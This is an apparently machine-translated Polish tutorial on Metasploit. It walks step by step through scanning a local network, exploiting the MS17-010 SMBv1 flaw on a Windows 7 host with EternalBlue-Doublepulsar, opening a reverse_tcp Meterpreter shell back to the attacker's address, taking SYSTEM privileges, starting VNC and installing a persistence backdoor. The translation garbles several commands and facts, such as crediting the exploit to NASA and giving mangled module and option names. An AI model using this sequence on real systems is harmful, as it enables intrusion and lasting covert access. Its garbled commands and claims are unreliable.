Samouczek Metasploit

Samouczek Metasploit

Jak omówiliśmy 25 najlepszych narzędzi Kali Linux i na początku umieściliśmy Metasploit, teraz omówmy i poznajmy o Metasploit. Polecamy zapoznanie się z Metasploit.

Metasploit początkowo stworzony przez H. D Moore w 2003 r. Metasploit-Framework jest całkowicie zapisywany za pomocą Ruby i jest standardowym pakietem zainstalowanym w systemie Kali Linux (a także prawie wszystkie systemy operacyjne penetracyjne). Ulubiony zestaw hakerów lub testerów penetracyjnych do badania luk w zabezpieczeniach, opracowywania i realizacji wyczynów na cele i inny rozwój bezpieczeństwa.

Metasploit jest wyposażony w kilka edycji, ogólnie podzielonych na dwie kategorie, bezpłatną wersję i wersję płatną. Bezpłatne wersje: Metasploit Framework Community Edition (interfejs oparty na CLI) i Armitage (interfejs oparty na GUI). Płatne wersje: Metasploit Express, Metasploit Pro i Strike Cobalt (jest podobny z Armitage, który jest dostarczany przez Strategic Cyber ​​LLC).

Metasploit umożliwia użytkownikom tworzenie (lub opracowanie) własnego kodu exploit, ale nie martw się, jeśli nie wiesz, jak kodować, Metasploit ma tak wiele modułów i są one stale aktualizowane. Obecnie Metasploit ma ponad 1600 exploitów i 500 ładunków. Prostym sposobem zrozumienia, jakie są exploits i ładunki, exploit jest w zasadzie sposób, w jaki atakujący dostarcza ładunek, poprzez otwór podatności systemu docelowego. Gdy atakujący uruchomił exploit, który zawiera ładunek przeciwko wrażliwemu celowi, wówczas rozmieszczony ładunek (ładunek używany do połączenia się z atakującym w celu uzyskania zdalnego dostępu do systemu docelowego), na tym etapie exploit jest zakończony i staje się nieistotny.

„Metasploit nie hakuje natychmiastowego narzędzia, jest to szalona framework”

Ten artykuł Metasploit dotyczy przeprowadzania testów penetracji z systemem docelowym za pomocą następującego przepływu:

  • Skanowanie podatności
  • Ocena podatności
  • Wykorzystanie
  • Uzyskanie zdalnego dostępu - właściciela systemu

PRZYGOTOWANIE

Upewnij się, że nasz Kali Linux ma najnowszą zaktualizowaną wersję. W każdej aktualizacji pojawią się ulepszenia. Uruchom następujące polecenia:

~# aktualizacja apt
~# Apt Upgrade -y
~# apt dist -upgrade -y

Gdy nasz maszyna będzie aktualna, zacznijmy od wystrzelenia konsoli Metasploit. W terminalu wpisz:

~# msfconsole

A także potrzebujesz dowolnego edytora tekstu, Gedit lub Leafpad, aby zebrać po drodze pewne informacje, zanim skompilujemy atak. Najpierw zidentyfikuj swój adres IP interfejsu bezprzewodowego, IP routera i maskę sieci.

Na podstawie powyższych informacji notowaliśmy adres IP WLAN1 i Router oraz maskę sieci. Tak więc notatka powinna wyglądać tak:

Atakujący IP (LHOST): 192.168.1.56
IP Gateway / Router: 192.168.1.1
Maska sieci: 255.255.255.0 (/24)


Krok 1: Skanowanie podatności

W konsoli Metasploit najpierw zbieramy informacje, takie jak docelowy adres IP, system operacyjny, otwarte porty i podatność. Metasploit pozwala nam uruchomić NMAP bezpośrednio z konsoli. Na podstawie powyższych informacji uruchom to polecenie, aby wykonać nasze zadanie gromadzenia informacji.

MSF> nmap -v 192.168.1.1/24 -Script vuln -pn -o

Z powyższego polecenia otrzymaliśmy wynik poniżej.

Mamy wrażliwy cel z systemem operacyjnym systemu Windows, a wrażliwy jest usługa SMBV1. Więc dodaj do notatki.

Target IP (Rhost): 192.168.1.57
Podatność: zdalna podatność na wykonywanie kodu w serwerach Microsoft SMBV1 (MS17-010)


Krok 2: Ocena podatności

Teraz znamy cel i jego podatność. Sprawdźmy podatność w konsoli Metasploit

Teraz znamy cel i jego podatność. Sprawdźmy podatność w konsoli Metasploit za pomocą modułu pomocniczego SMB_SCANNER. Uruchom następujące polecenie:

MSF> Użyj Auxiliary/Scanner/SMB/SMB_MS17_010
MSF Auxiliary (SMB_MS17_010)> Ustaw rhosts [Target IP]
MSF Auxiliary (SMB_MS17_010)> Uruchom

Metasploit jest przekonany o podatności i pokazuje dokładną edycję systemu Windows OS. Dodaj do uwagi:

Target OS: Windows 7 Ultimate 7600


Krok 3: Wykorzystanie

Niestety, Metasploit nie ma modułu exploit związanego z tą podatnością. Ale nie martw się, jest facet na zewnątrz i napisał kod exploit. Exploit jest znany, ponieważ jest inicjowany przez NASA, nazywa się go EternalBlue-Doublepulsar. Możesz go pobrać stąd lub możesz śledzić przewodnik z samouczka poniżej, aby zainstalować kod exploit w ramach Metasploit Framework.

Po śledzeniu powyższego przewodnika (upewnij się, że ścieżka jest taka sama jak samouczek). Teraz jesteś gotowy na wykorzystanie celu. Uruchom następujące polecenia:

Użyj exploit/Windows/SMB/EternalBlue_Doublepulsar
Ustaw ładunek Windows/MeterPreter/reverse_tcp
Ustaw ProcessInchstectsv.exe
Ustaw Rhost 192.168.1.57
Set Lhost 192.168.1.56

Wykorzystać

BOOM… Exploit odniesie sukces, mamy sesję miernika. Jak wspomniałem wcześniej, po uruchomieniu exploit wdrożył ładunek, czyli tutaj, Windows/Miernik/reverse_tcp.


Krok 4: Uzyskanie zdalnego dostępu

Poznajmy bardziej dostępne polecenia, wprowadź?'(bez znaku pytania) i patrz wymienione dostępne polecenia. Stdapi, Polecenia systemowe to:

Aby zobaczyć więcej informacji o systemie docelowym, użyj 'Sysinfo' Komenda. Wyjście powinno wyglądać tak.

Ponieważ wcześniej wstrzykujemy proces systemu (Spoolsv.exe), mamy przywilej systemu. Posiadamy cel. Możemy wiele zrobić z poleceniem do celu. Na przykład moglibyśmy uruchomić RDP lub po prostu ustawić pilot VNC. Aby uruchomić usługi VNC Enter Command:

~# uruchom vnc

Rezultatem powinien być komputer docelowy komputer, wygląda tak.

Najważniejszą częścią jest utworzenie tylnego. Backdooring służy do utrzymania dostępu, to jest jak łowienie ryb, nie wyrzucisz ryby z powrotem do wody, gdy znajdziesz rybę, prawda? Chcesz coś zrobić z rybą, czy to zaoszczędzić w lodówce do dalszych działań, takich jak gotowanie lub sprzedaż za pieniądze.

MeterPreter ma tę trwałą funkcję backdooring. Uruchom następujące polecenie i spójrz na dostępne parametry i argumenty.

Miernik> Uruchom wytrwałość -H

Jeśli nie czujesz się komfortowo z tym przestarzonym skryptem, najnowszy moduł trwałości jest poniżej Post/Windows/Manage/Tristence_exe. Możesz to odkryć dalej samodzielnie.

Metasploit jest ogromny, to nie tylko narzędzie, jest to framework, uważaj, że ma ponad 1600 exploitów i około 500 ładunków. Jeden artykuł nadaje się po prostu do dużego obrazu ogólnego wykorzystania lub pomysłu. Ale tak wiele się nauczyłeś z tego artykułu.

„Im bardziej śledzisz przepływ ataku, tym bardziej masz wyzwanie bez wysiłku."